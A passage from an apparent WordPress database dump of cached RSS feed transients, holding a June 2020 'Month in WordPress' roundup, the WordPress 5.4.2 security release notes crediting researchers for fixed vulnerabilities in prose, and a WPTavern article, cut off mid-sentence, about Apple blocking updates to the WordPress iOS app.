[&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:7872:\"\n<p>June was an exciting month for WordPress! Major changes are coming to the Gutenberg plugin, and WordCamp Europe brought the WordPress community closer together. Read on to learn more and to get all the latest updates.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>WordPress 5.4.2 released</h2>\n\n\n\n<p>We said hello to WordPress 5.4.2 on June 10. This security and maintenance release features 17 fixes and 4 enhancements, so we recommend that you update your sites immediately. To download WordPress 5.4.2, visit your Dashboard, click on <strong>Updates</strong>, then <strong>Update Now</strong>, or download the latest version directly from WordPress.org. For more information, visit <a href=\"https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/\">this post</a>, review the <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;resolution=fixed&amp;milestone=5.4.2&amp;order=priority\">full list of changes on Trac</a>, or check out the <a href=\"https://wordpress.org/support/wordpress-version/version-5-4-2/\">HelpHub documentation page</a> for <a href=\"https://wordpress.org/support/wordpress-version/version-5-4-2/\">version 5.4.2</a>. WordPress 5.4.2 is a short-cycle maintenance release. The next major release will be <a href=\"https://make.wordpress.org/core/5-5/\">version 5.5</a>, <a href=\"https://wordpress.org/about/roadmap/\">planned for August 2020</a>. <br><br>Want to get involved in building WordPress Core? Follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>, and join the #core channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Gutenberg 8.3 and 8.4</h2>\n\n\n\n<p>The core team launched Gutenberg <a href=\"https://make.wordpress.org/core/2020/06/11/whats-new-in-gutenberg-11-june/\">8.3</a> and <a href=\"https://make.wordpress.org/core/2020/06/24/whats-new-in-gutenberg-24-june/\">8.4</a> this month, paving the way for some exciting block editor features. Version 8.3 introduced enhancements like a reorganized, more intuitive set of block categories, a parent block selector, an experimental spacing control, and user-controlled link color options. Version 8.4 comes with new image-editing tools and the ability to edit options for multiple blocks.  The block directory search feature that was previously available as an experimental feature, is now enabled for all Gutenberg installations. For full details on the latest versions on these Gutenberg releases, visit these posts about <a href=\"https://make.wordpress.org/core/2020/06/11/whats-new-in-gutenberg-11-june/\">8.3</a> and <a href=\"https://make.wordpress.org/core/2020/06/24/whats-new-in-gutenberg-24-june/\">8.4</a>.</p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the #core-editor channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>WordPress Bumps Minimum Recommended PHP Version to 7.2</h2>\n\n\n\n<p>In a major update, WordPress <a href=\"https://meta.trac.wordpress.org/changeset/9959\">has bumped</a> the minimum PHP recommendation to 7.2. The ServeHappy API has been updated to set the minimum acceptable PHP version to 7.2, while the WordPress downloads page recommends 7.3 or newer. Previously, the ServeHappy dashboard widget was showing the upgrade notice to users of PHP 5.6 or lower. This decision comes <a href=\"https://meta.trac.wordpress.org/ticket/5257\">after discussions with the core Site Health team and the Hosting team</a>, both of which recommended that the upgrade notice be shown to users of PHP &lt;=7.1.</p>\n\n\n\n<h2>WordCamp Europe 2020 Moved Online</h2>\n\n\n\n<p>Following the success of a remote WordCamp Spain, <a href=\"https://2020.europe.wordcamp.org/\">WordCamp Europe</a> was held fully online from June 4 to 6. The event drew a record 8,600 signups from people based in 138 countries, along with 2,500 signups for contributor day. WCEU Online also showcased 33 speakers and 40 sponsors, in addition to a Q&amp;A with Matt Mullenweg. You can find the videos of the event in WordPress.tv by <a href=\"https://wordpress.tv/event/wordcamp-europe-2020/\">following this link</a>, or you can catch the<a href=\"https://www.youtube.com/channel/UCaYQGYDpXpU4A17kxN-AgJQ\"> live stream recording of the entire event from the WP Europe YouTube Channel</a>.</p>\n\n\n\n<p>Want to get involved with the Community team? <a href=\"https://make.wordpress.org/community/\">Follow the Community blog here</a>, or join them in the #community-events channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>. To organize a Meetup or WordCamp, <a href=\"https://make.wordpress.org/community/handbook/virtual-events/welcome/applying-for-a-virtual-event/\">visit the handbook page</a>.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further Reading:</h2>\n\n\n\n<ul><li>Josepha Haden (<a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>), the executive director of the WordPress project, <a href=\"https://wordpress.org/news/2020/06/equity-and-the-power-of-community/\">published a post </a>that highlights resources on how the global WordPress community can focus on equity to help dismantle racial, societal, and systemic injustice.&nbsp;</li><li>PHP, the primary programming language in which WordPress is written, celebrated its <a href=\"https://wptavern.com/php-marks-25-years\">25th anniversary</a> this month!</li><li>The Community team is<a href=\"https://make.wordpress.org/community/2020/06/18/pending-update-for-the-code-of-conduct/#comment-28294\"> updating the WordCamp code of conduct</a> to address discrimination based on age, caste, social class, and other identifying characteristics.</li><li>The WordPress Core team is promoting more inclusive language by <a href=\"https://make.wordpress.org/core/2020/06/18/proposal-update-all-git-repositories-to-use-main-instead-of-master/\">updating all git repositories to use `trunk` instead of `master`</a>. Additionally, the team proposes to <a href=\"https://make.wordpress.org/core/2020/06/24/proposal-rename-invalid-worksforme-and-wontfix-ticket-resolutions/\">rename&nbsp; “invalid,” “worksforme,” and “wontfix” ticket resolutions </a>to “not-applicable,” “not-reproducible” or “cannot-reproduce,” and “not-implemented,” respectively.&nbsp;</li><li>The Documentation team is working on an external linking policy and has <a href=\"https://make.wordpress.org/docs/2020/06/15/external-linking-policy-trusted-sources/\">started a discussion</a> on how to allow linking to trusted sources to benefit users.&nbsp;</li><li>The Core team has put up a proposal to <a href=\"https://make.wordpress.org/core/2020/06/10/merge-announcement-extensible-core-sitemaps/\">merge extensible core sitemaps to WordPress core</a> in the 5.5 release. The feature is currently available as a <a href=\"https://wordpress.org/plugins/core-sitemaps/\">feature plugin</a>.</li><li><a href=\"https://2020.denver.wordcamp.org/\">WordCamp Denver</a> was held online May 26–27. The event sold over 2,400 tickets and featured 27 speakers and 20 sponsors. You can catch the recorded live stream on the <a href=\"https://2020.denver.wordcamp.org/watch-now/\">event site</a>.</li><li>The Core team is working on <a href=\"https://make.wordpress.org/core/2020/06/29/updating-jquery-version-shipped-with-wordpress/\">updating the version of jQuery</a> used in WordPress core.</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it here</em></a><em>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8614\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 5.4.2 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 10 Jun 2020 19:19:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8592\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"WordPress 5.4.2 is now available! This security and maintenance release features 23 fixes and enhancements. Plus, it adds a number of security fixes—see the list below. These bugs affect WordPress versions 5.4.1 and earlier; version 5.4.2 fixes them, so you’ll want to upgrade. If you haven’t yet updated to 5.4, there are also updated versions [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:6827:\"\n<p>WordPress 5.4.2 is now available!</p>\n\n\n\n<p>This security and maintenance release features 23 fixes and enhancements. Plus, it adds a number of security fixes—see the list below.</p>\n\n\n\n<p>These bugs affect WordPress versions 5.4.1 and earlier; version 5.4.2 fixes them, so you’ll want to upgrade.</p>\n\n\n\n<p>If you haven’t yet updated to 5.4, there are also updated versions of 5.3 and earlier that fix the bugs for you.</p>\n\n\n\n<h3><strong>Security Updates</strong></h3>\n\n\n\n<p>WordPress versions 5.4 and earlier are affected by the following bugs, which are fixed in version 5.4.2. If you haven’t yet updated to 5.4, there are also updated versions of 5.3 and earlier that fix the security issues.</p>\n\n\n\n<ul><li>Props to Sam Thomas (jazzy2fives) for finding an XSS issue where authenticated users with low privileges are able to add JavaScript to posts in the block editor.</li><li>Props to Luigi &#8211; (<a href=\"https://www.gubello.me/\">gubello.me</a>) for discovering an XSS issue where authenticated users with upload permissions are able to add JavaScript to media files.</li><li>Props to Ben Bidner of the WordPress Security Team for finding an open redirect issue in <em>wp_validate_redirect()</em>.</li><li>Props to <a href=\"http://apapedulimu.click\">Nrimo Ing Pandum</a> for finding an authenticated XSS issue via theme uploads.</li><li>Props to <a href=\"https://blog.ripstech.com/authors/simon-scannell\">Simon Scannell of RIPS Technologies</a> for finding an issue where <em>set-screen-option</em> can be misused by plugins leading to privilege escalation.</li><li>Props to <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a> for discovering an issue where comments from password-protected posts and pages could be displayed under certain conditions.</li></ul>\n\n\n\n<p>Thank you to all of the reporters for&nbsp;<a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">privately disclosing the vulnerabilities</a>. This gave the security team time to fix the vulnerabilities before WordPress sites could be attacked.</p>\n\n\n\n<p>One maintenance update was also deployed to versions 5.1, 5.2 and 5.3. See the <a href=\"https://make.wordpress.org/core/2020/06/09/wordpress-5-4-2-prevent-unmoderated-comments-from-search-engine-indexation/\">related developer note</a> for more information.</p>\n\n\n\n<p>You can browse the&nbsp;<a href=\"https://core.trac.wordpress.org/query?status=closed&amp;resolution=fixed&amp;milestone=5.4.2&amp;order=priority\">full list of changes on Trac</a>.</p>\n\n\n\n<p>For more info, browse the full list of changes on Trac or check out the Version&nbsp;<a href=\"https://wordpress.org/support/wordpress-version/version-5-4-2/\">5.4.2 documentation page</a>.</p>\n\n\n\n<p>WordPress 5.4.2 is a short-cycle maintenance release. The next major release will be&nbsp;<a href=\"https://make.wordpress.org/core/5-5/\">version 5.5</a>.</p>\n\n\n\n<p>You can download WordPress 5.4.2 from the button at the top of this page, or visit your<strong>&nbsp;Dashboard → Updates</strong>&nbsp;and click&nbsp;<strong>Update Now</strong>.</p>\n\n\n\n<p>If you have sites that support automatic background updates, they’ve already started the update process.</p>\n\n\n\n<h3>Thanks and props!</h3>\n\n\n\n<p>In addition to the security researchers mentioned above, thank you to everyone who helped make WordPress 5.4.2 happen:</p>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/argentite\">argentite</a>, <a href=\"https://profiles.wordpress.org/asif2bd\">M Asif Rahman</a>, <a href=\"https://profiles.wordpress.org/audrasjb\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/ayeshrajans\">Ayesh Karunaratne</a>, <a href=\"https://profiles.wordpress.org/bdcstr\">bdcstr</a>, <a href=\"https://profiles.wordpress.org/delowardev\">Delowar Hossain</a>, <a href=\"https://profiles.wordpress.org/dhrrob\">Rob Migchels</a>, <a href=\"https://profiles.wordpress.org/donmhico\">donmhico</a>, <a href=\"https://profiles.wordpress.org/ehtis/\">Ehtisham Siddiqui</a>, <a href=\"https://profiles.wordpress.org/emlebrun\">Emilie LEBRUN</a>, <a href=\"https://profiles.wordpress.org/finomeno\">finomeno</a>, <a href=\"https://profiles.wordpress.org/garethgillman\">garethgillman</a>, <a href=\"https://profiles.wordpress.org/giorgio25b\">Giorgio25b</a>, <a href=\"https://profiles.wordpress.org/gma992\">Gabriel Maldonado</a>, <a href=\"https://profiles.wordpress.org/h71\">Hector F</a>, <a href=\"https://profiles.wordpress.org/ianbelanger\">Ian Belanger</a>, <a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/imath\">Mathieu Viet</a>, <a href=\"https://profiles.wordpress.org/javiercasares\">Javier Casares</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/jonkolbert\">jonkolbert</a>, <a href=\"https://profiles.wordpress.org/jonoaldersonwp\">Jono Alderson</a>, <a href=\"https://profiles.wordpress.org/joyously\">Joy</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie Lister</a>, <a href=\"https://profiles.wordpress.org/kjellr\">Kjell Reigstad</a>, <a href=\"https://profiles.wordpress.org/kthmd\">KT</a>, <a href=\"https://profiles.wordpress.org/markusthiel\">markusthiel</a>, <a href=\"https://profiles.wordpress.org/mayankmajeji\">Mayank Majeji</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce-Dwan</a>, <a href=\"https://profiles.wordpress.org/mislavjuric\">mislavjuric</a>, <a href=\"https://profiles.wordpress.org/mukesh27\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/nikhilbhansi\">Nikhil Bhansi</a>, <a href=\"https://profiles.wordpress.org/oakesjosh\">oakesjosh</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/passoniate\">Arslan Ahmed</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/poena\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/sabernhardt\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/samful\">Sam Fullalove</a>, <a href=\"https://profiles.wordpress.org/schlessera\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/skarabeq\">skarabeq</a>, <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/skithund\">Toni Viemerö</a>, <a href=\"https://profiles.wordpress.org/suzylah\">suzylah</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/utz119\">TeBenachi</a>, <a href=\"https://profiles.wordpress.org/whyisjake\">Jake Spurlock</a> and <a href=\"https://profiles.wordpress.org/yuhin\">yuhin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8592\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 25 Aug 2020 12:19:10 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Tue, 11 Aug 2020 19:12:19 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 1\";}}s:5:\"build\";s:14:\"20200501235608\";}','no'),(61604,'_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1598401150','no'),(61605,'_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1598357950','no'),(61606,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1598401150','no'),(61607,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: Automattic Tangles with Apple Over Lack of In-App Purchases in the WordPress for iOS App\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103709\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:241:\"https://wptavern.com/automattic-tangles-with-apple-over-lack-of-in-app-purchases-in-the-wordpress-for-ios-app?utm_source=rss&utm_medium=rss&utm_campaign=automattic-tangles-with-apple-over-lack-of-in-app-purchases-in-the-wordpress-for-ios-app\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7796:\"<p>Over the weekend, Matt Mullenweg announced on Twitter that Apple&rsquo;s App Store had blocked Automattic from shipping updates to WordPress&rsquo; official iOS app.  Automattic doesn&rsquo;t sell anything for WordPress.com or Jetpack inside the mobile apps, but the app included external purchasing methods that bypassed Apple&rsquo;s requirement of selling via in-app purchases. </p>\n\n\n\n<p>On the surface it seemed Apple was forcing a free app to add in-app purchases solely to extract its 30% cut of the revenue. The problem was if users drilled down deep enough into web help pages, they could <a href=\"https://twitter.com/mysk_co/status/1296914225718267907\">find a window to escape the walled garden</a>. While this seems like an unlikely way that a user would purchase an upgrade, Apple held the app&rsquo;s updates hostage in order to gain full compliance from Automattic.</p>\n\n\n\n<p>&ldquo;There are a few convoluted ways you can get to our web app from within previews, documentation, etc.,&rdquo; Mullenweg said in the Twitter conversation. &ldquo;We offered to block based on user agent server-side, but that was not deemed sufficient.&rdquo;</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Update: <a href=\"https://t.co/aCqKGxE7qL\">https://t.co/aCqKGxE7qL</a></p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/1297334622506737664?ref_src=twsrc%5Etfw\">August 23, 2020</a></blockquote>\n</div>\n\n\n\n<p>In a rare congenial response from Apple, the company apologized and reversed course 24 hours later, but not before Automattic had already acquiesced to adding in-app purchases. In a statement provided to <a href=\"https://www.macrumors.com/2020/08/21/wordpress-ios-app-apple-blocked-updates/\">MacRumors</a>, Apple said the issue has been resolved, although it did not specify if this happened weeks ago:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><em>We believe the issue with the WordPress app has been resolved. Since the developer removed the display of their service payment options from the app, it is now a&nbsp;free stand-alone app and does not have to offer in-app purchases. We have informed the developer and apologize for any&nbsp;confusion that we have caused.</em></p></blockquote>\n\n\n\n<h2>The Official WordPress Apps Need to Be Separate from Automattic&rsquo;s Commercial Interests</h2>\n\n\n\n<p>Automattic&rsquo;s control of WordPress&rsquo; official mobile apps has long been a controversial issue in the open source community. Since the company heavily subsidizes the apps&rsquo; development, its agenda for the apps goes completely unrivaled. This is why the official apps contain WordPress.com and Jetpack-specific features that are unnecessary for many self-hosted site owners.</p>\n\n\n\n<p>Although the apps are open source, historically, they have <a href=\"https://wptavern.com/wordpress-for-android-5-7-adds-path-to-upgrade-wordpress-com-plan\">rarely received contribution</a> from developers outside Automattic due to the complexity of the code. <a href=\"https://twitter.com/danroundhill/status/1296941098393190401\">This hasn&rsquo;t changed</a>. In 2016, when <a href=\"https://apps.wordpress.com/2016/08/26/wordpress-for-android-version-5-7/\">version 5.7 of the apps came out for iOS</a> and Android, it looked like Automattic was pushing forward on building <a href=\"https://wptavern.com/wordpress-for-android-5-7-adds-path-to-upgrade-wordpress-com-plan\">an upgrade path for WordPress.com plans</a>. At that time, features for self-hosted sites began to lag behind significantly. Automattic mobile engineer Maxime Biais said the commitment to support both was equal.</p>\n\n\n\n<p>&ldquo;WordPress.com features are not prioritized over self hosted,&rdquo; he said. &ldquo;When we can implement things for both we do it, but when we can&rsquo;t (like when we don&rsquo;t have the XMLRPC endpoint) we do it for WordPress.com and usually ask Core to do the changes so we can implement the same feature for self-hosted users.&rdquo;</p>\n\n\n\n<p>Developing the app for self-hosted users and Automattic&rsquo;s customers at the same time was always a delicate balance. This situation with the App Store underscores the need for the official open source apps to be separate from the control of any commercial entity, but the reality is that these apps would not exist without Automattic. Their continued maintenance is entirely funded by the company. Unfortunately, attracting outside contributions from the broader community has been difficult given that Automattic is the only company whose products are allowed to be built into the official WordPress apps.</p>\n\n\n\n<p>Prior to Apple backing off of its requirement for Automattic to add in-app purchases, the company had presumably exhausted every other option before giving in to Apple&rsquo;s demands. At that point Mullenweg started crowd sourcing ideas from his followers on Twitter to look for a way forward for the community. This seemed to mark a new era for the apps where Mullenweg was willing to consider adding other companies&rsquo; products into the apps alongside his own and then passing the revenue along.</p>\n\n\n\n<p>&ldquo;New name: The app has always done a ton of work to support WordPresses hosted anywhere, using the XML-RPC API included in core WP since WP 2.6 was released in 2008,&rdquo; he said. &ldquo;That&rsquo;s why we called it &lsquo;WordPress&rsquo; and not &lsquo;WordPress.com&rsquo; or &lsquo;Jetpack.&rsquo;</p>\n\n\n\n<p>&ldquo;I am a big believer in the sanctity of licenses. (Open source relies on licenses and copyright.) We agreed to this license when we signed up for (and stayed in) the app store, so going to follow and abide by the rules. Not looking to skirt it, hence doing what they asked us to.</p>\n\n\n\n<p>&ldquo;Allow others IAP: All of the code is open source, if other hosts or plugins wanted to support in-app purchases for their plans we could accept patches and have Automattic pass through the revenue.&rdquo;</p>\n\n\n\n<p>The idea of Automattic becoming the arbiter of which companies have access to selling through the official mobile apps introduces even more conflicts of interest into what was already a murky entanglement. This setup would be wholly objectionable to many in the open source community. For the sake of clarity 